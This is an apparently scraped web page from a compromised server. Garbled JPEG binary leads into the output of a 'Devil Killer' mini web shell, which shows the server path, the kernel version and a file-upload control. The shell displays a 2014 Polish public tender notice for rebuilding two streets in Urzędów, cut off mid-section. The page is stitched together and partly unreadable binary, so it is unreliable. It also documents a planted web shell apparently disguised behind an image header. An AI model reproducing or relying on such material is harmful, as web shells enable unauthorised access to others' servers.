JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140901/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140901/289732-N-2014.html

<p class="kh_header"><b>Urzędów: Przebudowa ulicy Kościelnej i Janowskiej</b><br>
<b>Numer ogłoszenia: 289732 - 2014; data zamieszczenia: 01.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Urzędów , ul. Rynek 26, 23-250 Urzędów, woj. lubelskie, tel. 81 822 50 42, faks 81 822 51 50.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugurzedow.bip.bip.lubelskie.pl  zakładka ogłoszenia zakładka przetargi</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ulicy Kościelnej i Janowskiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przebudowa ulicy Kościelnej i Janowskiej 
-  część I   przebudowa wodociągu wraz z przyłączami
-  cześć II  przebudowa nawierzchni ulic 
 
Część I  

Roboty ziemne

1.    Roboty pomiarowe przy liniowych robotach ziemnych - sieć wodociągowa     - 0,202 km,
2.    Roboty ziemne wykonywane koparkami przedsiębiernymi  o poj. łyżki 0,15 m3 , gr. kat. III z transportem    urobku na odl. do 1 km samochodami samowyładowczymi - 470,475 m3,
3.    Wykopy liniowe o szerokości 0,8-2,5 m i głębokości do 3,0 m o ścianach pionowych w gruntach suchych kat.   III-IV    - 47,048 m3,
4.   Zasypywanie wykopów o ścianach pionowych o szerokości 0,8-2,5 m i głębokości do 3,0 m w gr. kat. I-III,  zasypanie piaskiem z ubiciem warstwami  - 452,803,

Roboty instalacyjne
  
5.    Podłoża pod kanały i obiekty z materiałów sypkich gr. 15 cm  - 15,375 m3,
6.    Sieć wodociągowa - montaż rurociągów z rur polietylenowych (PE, PEHD) o śr. zewnętrznej 125 mm -144,50  
       m,
7.    Sieć wodociągowa - montaż rurociągów z rur polietylenowych (PE, PEHD) o śr. zewnętrznej 225 mm -57,50  
      m,
8.   Sieć wodociągowa - montaż rurociągów z rur polietylenowych (PE, PEHD) o śr. zewnętrznej 90 mm -0,50  m,
9.   Zasuwy typu E kołnierzowe z obudową  o śr. do 100mm montowane na rurociągach PVC i PE   -  1 kpl,
    10.   Sieci wodociągowe - połączenie rur polietylenowych ciśnieniowych PE, PEHD metodą zgrzewania czołowego  
      o śr. zewn. 125 mm  -  15 złącz,
    11.    Sieci wodociągowe - połączenie rur polietylenowych ciśnieniowych PE, PEHD metodą zgrzewania czołowego  
       o śr. zewn. 225 mm  -  10 złącz,
    12.   Sieci wodociągowe - połączenie rur polietylenowych ciśnieniowych PE, PEHD metodą zgrzewania czołowego  
            o śr. zewn. 90 mm  -  6 złącz,
    13.   Sieci wodociągowe - montaż kształtek ciśnieniowych PE, PEHD o połączeniach zgrzewano-kołnierzowych  
            ( tuleje kołnierzowe na luźny kołnierz) o śr. zew.  160-225 mm  - 2 szt.,
    14.   Sieci wodociągowe - montaż kształtek ciśnieniowych PE, PEHD o połączeniach zgrzewano-kołnierzowych  
            ( tuleje kołnierzowe na luźny kołnierz) o śr. zew.  110-140 mm  - 2 szt.,
    15.   Sieci wodociągowe - montaż kształtek ciśnieniowych PE, PEHD o połączeniach zgrzewano-kołnierzowych  
            ( tuleje kołnierzowe na luźny kołnierz) o śr. zew. do 90 mm  - 3 szt.,
    16.   Sieci wodociągowe - montaż kształtek ciśnieniowych PE, PEHD o połączeniach zgrzewanych o śr. zew.    
          160-225 mm  - 4 szt.,
  17.   Sieci wodociągowe - montaż kształtek ciśnieniowych PE, PEHD o połączeniach zgrzewanych o śr. zew.    
          125  mm  -  3 szt.,
 18.   Sieci wodociągowe - kształtki żeliwne ciśnieniowe  kołnierzowe  o śr. 200 mm -  2 szt.,
 19.  Hydranty pożarowe podziemne  o śr. 80  mm, żel. steroidalne  - 3 kpl,
 20.  Oznakowanie trasy wodociągu ułożonego w ziemi taśmą z tworzywa sztucznego z wkładką identyfikacyjną 
         - 202 m,
 21.  Próba wodna szczelności  sieci wodociągowych z rur typu PVC o śr. do 110 mm - 2 próby,
 22.  Dezynfekcja rurociągów sieci wodociągowej o średnicy nominalnej rur 150 mm - 2 pob.,
 23.  Jednokrotne płukanie sieci wodociągowych  o średnicy   nominalnej rur 110 mm - 2 pob.,
 24.  Obruki betonowe do hydrantów  - 3 kpl.,
 25.  demontaż istniejących rurociągów kolidujących z nowymi projektowanymi - 1 kpl.

Wymiana przyłączy wodociągowych - roboty ziemne

26.  Roboty pomiarowe przy liniowych robotach ziemnych - sieć wodociągowa   - 0,17 km,
27.  Remont cząstkowy chodników z płyt betonowych 35x35x5 cm na podsypce  piaskowej z wypełnieniem spoin piaskiem  - 26,40 m2,
28.  Roboty ziemne wykonywane koparkami przedsiębiernymi  o poj. łyżki 0,15 m3 , gr. kat. III z transportem    urobku na odl. do 1 km samochodami samowyładowczymi - 128,75 m3,
29.  Zasypywanie wykopów o ścianach pionowych o szerokości 0,8-2,5 m i głębokości do 3,0 m w gr. kat. I-III,  zasypanie piaskiem z ubiciem warstwami  - 124,54 m3,
30.   Wykopy oraz przekopy  o głęb. do 3 m, wykonane na odkład koparkami podsiębiernymi o poj. łyżki 0,25 - 0,60m3  w gr. kat. III-IV   259,459 m3,
31.   Wykopy liniowe  o szerokości  0,8 - 2,5 m i głębokości  do 3,0 m o ścianach pionowych w gruntach suchych kat. III-IV - 28,829 m3,
32.   Zasypywanie wykopów o ścianach pionowych o szerokości 0,8-2,5 m i głębokości do 3,0 m w gr. kat. I-III,  zasypanie piaskiem z ubiciem warstwami  - obsypka - 17,16 m3,
33.  Zasypanie wykopów  fund. Podłużnych  punktowych rowów, wykopów obiektowych  spycharkami z zagęszczeniem mechanicznym ( gr. warstwy w stanie luźnym  30 cm - kat. gr. III-IV    262,55 m3,
34.   Roboty ziemne wykonywane koparkami podsiębiernymi o poj. łyżki 0,15 m3 w gr. kat. I-III  w ziemi uprzednio zmagazynowanej w hałdach z transportem urobku na odległość do 1 km samochodami samowyładowczymi -25,74m3,
35.  Usunięcie kamieni  (margla) z trasy wykopu, oraz naprawa ogrodzeń, uzupełnienie  nasadzeń krzewów  owocowych itp. (doprowadzenie terenu do stanu pierwotnego) - 1 kpl.

Roboty instalacyjne 

36.  Podłoża pod kanały i obiekty z materiałów sypkich gr. 15 cm - 12,788 m3,
37. Przyłącze wodociągowe z rur ciśnieniowych PE - rurociągi o średnicy 40 mm (nakłady na 1m przyłącza) 
-200,40 m,
38. Podłączenie instalacji do sieci wodociągowej - nasady rurowe  (opaski) na istniejących rurociągach o śr. 225 mm, obejma gwintowana  do nawiercenia o śr. 225x2 mm z zasuwą DN32  (5/4  /2) z obudową teleskopową i skrzynką uliczną  - 1 szt.,
39. Podłączenie instalacji do sieci wodociągowej - nasady rurowe  (opaski) na istniejących rurociągach o śr. 125 mm, obejma gwintowana  do nawiercenia o śr. 125x2 mm z zasuwą DN32  (5/4  /2) z obudową teleskopową i skrzynką uliczną  - 12 szt.,
40. Kształtki  PE na rurociągach PE o śr. zewn. Rury 40 mm - 26 szt.,
41.  Przejścia wodociągu przez ściany z betonu żwirowego o gr. do 25 cm dla przyłączy wodociągowych o śr. nom. 40 mm  w tulejach z rur PE o śr. 63 mm - 13 przejść,
42. Oznakowanie trasy wodociągu ułożonego  w ziemi  taśmą z tworzywa sztucznego z wkładką identyfikacyjną - 170,50 m,
43. Próba wodna  szczelności sieci wodociągowych z rur typu PVC o śr. do 110 mm  - 13 prób,
44. Dezynfekcja rurociągów  sieci wodociągowych , o średnicy nominalnej  rur  40 mm - 13 pob.,
45. Obruki betonowe do skrzynek ulicznych do zasuw - 13 kpl,
46. Oznakowanie trasy wodociągu  na ogrodzeniu - 13 kpl,
47. Zapewnienie dostawy wody do posesji na czas wykonywania robót - 1kpl,

Obsługa geodezyjna
48. Obsługa geodezyjna - 1 kpl.

  
Część II
Roboty przygotowawcze i rozbiórkowe
1.	Roboty pomiarowe przy liniowych robotach ziemnych - trasa dróg w terenie równinnym - 0,300 km,
2.	Mechaniczne rozebranie nawierzchni z mas mineralno-bitumicznych o gr. 4 cm, wywóz materiałów z rozbiórki na odległość  5km - 1 911 m2,
3.	Mechaniczne rozebranie podbudowy z mas mineralno-bitumicznych o gr. 6 cm, wywóz materiałów z rozbiórki na odległość  5km - 1 911 m2,
4.	Mechaniczne rozebranie podbudowy z kruszywa, trylinki, brukowca o grubości 15-30 cm, wywóz materiałów na odl. 5 km - 1 911 m2,
5.	Rozebranie obrzeży trawnikowych o wym. 6x20 cm, na podsypce piaskowej, wywóz materiałów na odl. 5 km - 384,70 m,
6.	Rozebranie krawężników betonowych na podsypce cementowo-piaskowej wraz z ławą betonową, wy7wóz materiałów z rozbiórki na odl. 5 km - 646,40 m,
7.	Ręczne rozebranie nawierzchni z kostki kamiennej i betonowej, płytek chodnikowych na podsypce piaskowej, wywóz materiałów z rozbiórki na odl. 5 kim - 666,80 m2,
Roboty ziemne
8.	Koryta wykonywane mechanicznie głęb. 18 cm na całej szerokości jezdni w gruntach kat. II-IV, przy użyciu spycharki i walca statycznego samojezdnego - 1 911,00 m2,
9.	Koryta wykonywane mechanicznie o głębokości 10 cm na całej szerokości chodników, w gruntach kat. III-IV  - 567 m2,
10.	Koryta wykonywane mechanicznie o głębokości  41 cm, na całej szerokości zjazdów, w gruntach kat. III-IV- 69 m2,
11.	Roboty ziemne wykonywane ładowarkami kołowymi o poj. 1,25 m3 w ziemi w hałdach z transportem urobku samochodami samowyładowczymi 5-10 t na odl. do 1 km , grunt kat. III- 4303,
Krawężniki i obrzeża betonowe
      12.   Krawężniki betonowe wystające o wymiarach 15x30 cm wraz z wykonaniem ław betonowych, na 
	podsypce cementowo-piaskowej - 554 m,
      13.  Obrzeża betonowe o wymiarach 20x6 cm na podsypce spoiny wypełnione piaskiem - 676 m,
      14.  Wykonanie palisady z elementów betonowych 0,7 m x 0,15 m - zabezpieczenie drzew - 5 m,
      15. Obrzeża betonowe o wymiarach 30x8 cm na podsypce piaskowej spoiny wypełniane zaprawą 
             cementową - 94 m
Regulacja wysokościowa elementów naziemnych infrastruktury technicznej uzbrojenia podziemnego

      16.  Regulacja pionowa studzienek dla urządzeń podziemnych - studzienek kanalizacyjnych - 12 szt.,
      17.  Regulacja pionowa studzienek dla urządzeń podziemnych - zaworów wodociągowych i gazowych   
             23 szt.,
      18.  Regulacja pionowa studzienek dla urządzeń podziemnych - studzienek telefonicznych  - 7 szt.

Podbudowa
       19.  Piasek stabilizowany cementem o Rm=2,5 MPa grubość warstwy po zagęszczeniu  10 cm 
              (chodnik) i zjazdy - 636,50 m2,
       20.  Piasek stabilizowany cementem o Rm=2,5 MPa grubość warstwy po zagęszczeniu  15 cm
              (jezdnia) - 1 932,00 m2,
       21.  Podbudowa zasadnicza z tłucznia kamiennego , grubość warstwy  po zagęszczeniu 20 cm
             (jezdnia) - 1 932,00 m2,
     22.  Piasek stabilizowany cementem o Rm=5MPa, grubość warstwy po zagęszczeniu 15 cm(zjazdy) -
             69,50 m2

Nawierzchnia
    23.   Chodniki z kostki brukowej betonowej grubości 6 cm szarej, układane na podsypce cementowo-
             piaskowej spoiny wypełniane piaskiem (chodnik) - 575,00 m2,
    24.    Jezdnia i zjazdy z kostki brukowej betonowej grubości 8 cm, szarej, układane na podsypce 
             grysowej, spoiny wypełniane piaskiem - 2001,50 m2

Roboty wykończeniowe
    25.   Ręczne plantowanie (obrobienie na czysto) powierzchni gruntu rodzimego kat. I-III    200 m2,
    26.   Humusowanie skarp z obsianiem , przy grubości warstwy humusu 5 cm - 200 m2

Przedmiot zamówienia usytuowany jest w układzie urbanistycznych objętym ochroną konserwatorską. Prace będą wykonywane przy nadzorze archeologicznym.

Na podstawie załączników nr 1a do niniejszej siwz - przedmiary robót - wykonawcy opracują kosztorysy ofertowe. Kosztorysy ofertowe należy opracować oddzielnie na część I i oddzielnie na część II przedmiotu zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.13.00-8, 45.11.00.00-1, 45.11.10.00-8, 45.23.30.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie, uzna że wykonawca spełni  warunek jeżeli złoży oświadczenie  o braku podstaw do wykluczenia - według załącznika nr 3</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy muszą spełnić następujące warunki ( w przypadku wspólnego ubiegania się o udzielenie  zamówienia przez dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniane będzie ich łączne doświadczenie) posiadania wiedzy i doświadczenia - wykazać, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonali co najmniej jedną robotę budowlaną  polegającą na budowie, przebudowie, modernizacji dróg, placów, parkingów i innych nawierzchni z mieszanek mineralno-bitumicznych asfaltowych,  o wartości nie mniejszej niż 250 000 złotych, oraz jedną robotę budowlaną polegająca na budowie, przebudowie, wymianie  sieci wodociągowej o wartości nie mniejszej niż 100 000 złotych.  Wykonawcy (dla spełnienia warunku wiedzy i doświadczenia) muszą potwierdzić, że roboty te  zostały wykonane w sposób należyty oraz zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. 
Wykonawcy zobowiązani są przedłożyć za  okres ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wykaz robót budowlanych (załącznik nr 5 do siwz)  z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy  zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.

Dowodami, które mają potwierdzić czy roboty te zostały wykonane w sposób należyty oraz wskazującymi, czy  zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone są poświadczenia.
W przypadku gdy wykonawca  wskaże w ofercie przetargowej podwykonawcę, który będzie wykonywał część robót w danym zamówieniu , zamawiający dopuszcza przyjęcie dokumentów dowodów na te roboty, wystawionych na podwykonawcę ( mimo że nie mamy tutaj do czynienia z podmiotem składającym ofertę wspólnie).
W przypadku, gdy złożone przez Wykonawców dokumenty zawierające dane w innych walutach niż określono to w treści SIWZ, Zamawiający jako kurs przeliczeniowy waluty przyjmie kurs średni walut NBP z dnia ogłoszenia niniejszego zamówienia w BZP. Tabele kursów walut dostępne są pod następującym adresem www.nbp.pl zakładka kursy walut</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie, uzna że wykonawca spełni  warunek jeżeli złoży oświadczenie o spełnieniu warunków udziału w postępowaniu określone w art. 22 ust. 1 ustawy Pzp - według załącznika nr 2.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy spełnią warunek składając oświadczenie według propozycji -załącznika nr 6 do SIWZ, że osoby, które będzie pełnić funkcje kierownika budowy, robót  posiadają wykształcenie i kwalifikacje wymagane do świadczenia usług we wskazanych  wyżej branżach budowlanych, oraz posiadają uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie (do kierowania robotami budowlanymi) - 1 osoba  w specjalności drogowej bez ograniczeń, oraz 1 osoba  w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych - bez ograniczeń , odpowiadające wymaganiom określonym w ustawie Prawo budowlane, lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów.
W przypadku gdy wykonawca dysponuje personelem kierowniczym spoza terytorium RP osoby te muszą:
- posiadać wykształcenie i kwalifikacje wymagane do świadczenia usług we wskazanych wyżej branży budowlanej,
- posiadać decyzję o uznaniu kwalifikacji zawodowych we wskazanych  wyżej branżach budowlanych  zgodnie z ustawą z dnia 18 marca 2008r. o zasadach uznawania kwalifikacji zawodowych w państwach członkowskich Unii Europejskiej lub posiadać prawo do świadczenia usług transgranicznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie, uzna że wykonawca spełni  warunek jeżeli złoży oświadczenie o spełnieniu warunków udziału w postępowaniu określone w art. 22 ust. 1 ustawy Pzp - według załącznika nr 2.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Zamawiający określa iż robotami budowlanymi, których dotyczy obowiązek wykazania przez wykonawcę w wykazie robót (załącznik nr 5 do siwz) w niniejszym postępowaniu są w szczególności,   wszystkie wykonane przez wykonawcę roboty budowlane branży drogowej w zakresie nawierzchni z  kostki brukowej , oraz w zakresie budowy, przebudowy wymiany sieci wodociągowej, obejmujące zakres niniejszego przedmiotu zamówienia ( § 1 ust. 4 Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013r. w sprawie rodzajów dokumentów, jakich zamawiający może żądać od wykonawcy, oraz form w jakich te dokumenty mogą być składane).;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) wypełniony formularz ofertowy - podpisany przez wykonawcę;
2) kosztorysy ofertowe  opracowane według przedmiaru robót;
3) dokumenty potwierdzające posiadanie uprawnień,  pełnomocnictw osób składających ofertę, o ile nie wynikają z przepisów prawa lub z przedstawionych dokumentów rejestrowych.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający wprowadza możliwość zmiany postanowień umowy  w stosunku do treści oferty :
